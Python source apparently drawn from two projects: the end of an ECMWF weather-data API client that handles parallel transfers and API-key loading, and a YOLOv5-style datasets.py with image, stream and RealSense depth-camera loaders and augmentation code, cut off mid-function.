if len(request_data) == 0:
self.log("No requests were given", 'warning')
return
for [index, request] in enumerate(request_data):
if len(request_data) > 1:
self._process_request(request, index + 1)
else:
self._process_request(request, 1)
self.log("ECMWFDataServer completed all requests", 'info')
def retrieve_parallel(self, request_data, parallel_count=None):
"""
        Retrieve the given datasets in parallel - the different transfers are run in parallel, but each individual
dataset is downloaded sequentially
:param request_data: parameter list for transfer, or list of multiple parameter lists
:param parallel_count: maximum number of parallel / concurrent transfers
"""
if isinstance(request_data, dict):
request_data = [request_data]
elif not isinstance(request_data, list):
self.log("The request data object should be a dictionary with the parameters or a list with multiple"
"dictionaries for multiple transfers", 'error')
return
if len(request_data) == 0:
self.log("No requests were given", 'warning')
return
# Determine parallel count
if not isinstance(parallel_count, int):
try:
parallel_count = config.get_int('parallel_count', 'network')
except ConfigError:
self.log("No parallel count given and not set in configuration file either", 'error')
self.transfer_queue = queue.Queue()
# Launch the desired number of threads to process the requests
self.log("Launching %s threads to process transfers" % parallel_count, 'info')
threads = []
for i in range(parallel_count):
t = threading.Thread(target=self._parallel_worker)
t.daemon = True
t.start()
threads.append(t)
# Insert all transfers in the queue
request_id = 1
for transfer in request_data:
self.transfer_queue.put([transfer, request_id])
request_id += 1
# Wait 3 seconds to not make too many API calls
time.sleep(3)
# Add stop indicators to the queue, 1 for each thread
for i in range(parallel_count):
self.transfer_queue.put(None)
# Wait for all threads to complete
for i in range(0, parallel_count):
threads[i].join()
self.log("ECMWFDataServer completed all requests in parallel", 'info')
def _process_request(self, request_data, request_id):
"""
Process the dataset transfer request. Used in both normal and parallel requests.
:param request_data: parameter list for transfer
:param request_id: identification of requests, used when multiple or parallel requests are initialised to inform
the user of the progress and which request is currently processed
"""
try:
disable_ssl_validation = config.get_boolean('disable_ssl_validation', 'network')
except ConfigError:
disable_ssl_validation = False
if request_id is not None:
self.log("Starting request %i" % request_id, 'info', request_id)
else:
self.log("Starting request", 'info', request_id)
try:
connection = ApiConnection(self.api_url, "datasets/%s" % request_data['dataset'], self.api_email,
self.api_key, self.log, disable_ssl_validation=disable_ssl_validation,
request_id=request_id)
connection.transfer_request(request_data, request_data['target'])
except ApiConnectionError as e:
self.log("API connection error: %s" % e, 'error', request_id)
def _parallel_worker(self):
"""
Worker function to process parallel transfers, multiple instances launched in threads
"""
if self.transfer_queue is None:
self.log("No transfer queue specified for parallel transfer", 'error')
while True:
item = self.transfer_queue.get()
            # A None item indicates we have to stop
if item is None:
break
elif not isinstance(item, list) or len(item) != 2:
self.log("Invalid transfer item in queue", 'warning')
continue
self._process_request(item[0], item[1])
def _get_api_key_values(self):
"""
Get the API key from the environment or the '.ecmwfapirc' file. The environment is looked at first. Raises
APIKeyFetchError when unable to get the API key from either the environment or the ecmwfapirc file
:return: tuple with the key, url, and email forming our API key
"""
try:
key_values = self._get_api_key_from_environ()
except APIKeyFetchError:
try:
key_values = self._get_api_key_from_rcfile()
except APIKeyFetchError:
raise
return key_values
@staticmethod
def _get_api_key_from_environ():
"""
Obtain the API key from the environment
:return: tuple with API key, url and e-mail
"""
try:
api_key = os.environ['ECMWF_API_KEY']
api_url = os.environ['ECMWF_API_URL']
api_email = os.environ['ECMWF_API_EMAIL']
except KeyError:
raise APIKeyFetchError("ERROR: Could not get the API key from the environment")
return api_key, api_url, api_email
@staticmethod
def _get_api_key_from_rcfile():
"""
Obtain the API key from the file ~/.ecmwfapirc
:return: tuple with API key, url and e-mail
"""
rc = os.path.normpath(os.path.expanduser("~/.ecmwfapirc"))
try:
with open(rc) as f:
api_config = json.load(f)
# Failed reading from file
except IOError as e:
raise APIKeyFetchError(str(e))
# JSON decoding failed
except ValueError:
raise APIKeyFetchError("Missing or malformed API key in '%s'" % rc)
# Unexpected error
except Exception as e:
raise APIKeyFetchError(str(e))
try:
key = api_config['key']
url = api_config['url']
email = api_config['email']
        except (KeyError, TypeError):
raise APIKeyFetchError("Missing or malformed API key in '%s'" % rc)
return key, url, email
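# Usage sketch (illustrative only; the dataset name and MARS keywords below are
# placeholders, not a tested request, and the import path is an assumption):
#   from ecmwfapi import ECMWFDataServer
#
#   server = ECMWFDataServer()          # credentials come from ~/.ecmwfapirc or the environment
#   server.retrieve({
#       "dataset": "interim",           # used to build the datasets/<name> endpoint
#       "target": "output.grib",        # local file the transfer is written to
#       # ... remaining MARS keywords (date, param, grid, ...) as required by the dataset
#   })
#   # or, for several requests with at most two concurrent transfers:
#   # server.retrieve_parallel([request_1, request_2], parallel_count=2)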
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
import pyrealsense2 as rs
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
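# Usage sketch (illustrative; `opt` is assumed to carry a `single_cls` attribute as
# accessed above, and `hyp` is the augmentation hyperparameter dict):
#   dataloader, dataset = create_dataloader('data/images/train', 640, 16, 32, opt,
#                                           hyp=hyp, augment=True)
#   for imgs, targets, paths, shapes in dataloader:
#       ...  # imgs: BCHW uint8 tensor; targets: (n, 6) rows of [image_idx, cls, x, y, w, h]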
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
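# Usage sketch (illustrative): LoadImages yields (path, letterboxed CHW RGB array,
# original BGR image, cv2.VideoCapture or None) for every image and video frame found:
#   for path, img, im0, cap in LoadImages('data/images', img_size=640):
#       ...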
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadRealSense2: # Stream from Intel RealSense D435
"""
https://github.com/GilbertTjahjono/Multiple_Object_Tracking
"""
def __init__(self, width=640, height=480, fps=30):
        # Variables for setup
self.mode = 'RealSense'
self.width = width
self.height = height
self.fps = fps
self.imgs = [None]
self.depths = [None]
self.img_size = 480
self.half = False
# Setup
self.pipe = rs.pipeline()
self.cfg = rs.config()
self.cfg.enable_stream(rs.stream.depth, self.width, self.height, rs.format.z16, self.fps)
self.cfg.enable_stream(rs.stream.color, self.width, self.height, rs.format.bgr8, self.fps)
# Start streaming
self.profile = self.pipe.start(self.cfg)
self.path = rs.pipeline_profile()
print(self.path)
print("streaming at w = " + str(self.width) + " h = " + str(self.height) + " fps = " + str(self.fps))
def update(self):
while True:
#Wait for frames and get the data
self.frames = self.pipe.wait_for_frames()
self.depth_frame = self.frames.get_depth_frame()
self.color_frame = self.frames.get_color_frame()
if not self.depth_frame or not self.color_frame:
continue
img0 = np.asanyarray(self.color_frame.get_data())
#align + color depth -> for display purpose only
depth0 = self.colorizing(self.aligned(self.frames))
# aligned depth -> for depth calculation
distance0, depth_intrin, aligned_depth_frame = self.aligned_depth(self.frames)
#get depth_scale
depth_scale = self.scale(self.profile)
self.imgs = np.expand_dims(img0, axis=0)
self.depths = depth0
self.distance = distance0
break
#print("ini depth awal: " + str(np.shape(self.depths)))
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
#print("ini s: " + str(np.shape(s)))
self.rect = np.unique(s, axis=0).shape[0] == 1
#print("ini rect: " + str(np.shape(self.rect)))
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
time.sleep(0.01) # wait time
return self.rect, depth_scale, depth_intrin, aligned_depth_frame
def scale(self, profile):
depth_scale = profile.get_device().first_depth_sensor().get_depth_scale()
return depth_scale
def aligned_depth(self, frames):
self.align = rs.align(rs.stream.color)
frames = self.align.process(frames)
aligned_depth_frame = frames.get_depth_frame()
depth_real = np.asanyarray(aligned_depth_frame.get_data())
depth_intrin = aligned_depth_frame.profile.as_video_stream_profile().intrinsics
return depth_real, depth_intrin, aligned_depth_frame
def aligned(self, frames):
self.align = rs.align(rs.stream.color)
frames = self.align.process(frames)
aligned_depth_frame = frames.get_depth_frame()
return aligned_depth_frame
def colorizing(self, aligned_depth_frame):
self.colorizer = rs.colorizer()
colorized_depth = np.asanyarray(self.colorizer.colorize(aligned_depth_frame).get_data())
return(colorized_depth)
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
self.rect, depth_scale, depth_intrin, aligned_depth_frame = self.update()
img0 = self.imgs.copy()
depth = self.depths.copy()
distance = self.distance.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
img_path = 'realsense.mp4'
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
#print("ini img letterbox: " + str(np.shape(img)))
# Stack
img = np.stack(img, 0)
#print("ini img-padding: " + str(np.shape(img)))
# Convert Image
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to 3x416x416, uint8 to float32
img = np.ascontiguousarray(img)
# Return depth, depth0, img, img0
dis = {'distance': distance,
'depth_scale': depth_scale,
'depth_intrin': depth_intrin,
'aligned_depth_frame': aligned_depth_frame
}
return str(img_path), img, img0, dis
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
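# Example (assumed dataset layout): the first '/images/' path component is swapped for
# '/labels/' and the file suffix becomes '.txt', e.g.
#   img2label_paths(['/data/coco128/images/train2017/000000000009.jpg'])
#   # -> ['/data/coco128/labels/train2017/000000000009.txt']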
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path, prefix) # re-cache
else:
cache = self.cache_labels(cache_path, prefix) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + desc, total=n, initial=n)
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
        nm, nf, ne, nc = 0, 0, 0, 0  # number missing, found, empty, corrupted
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
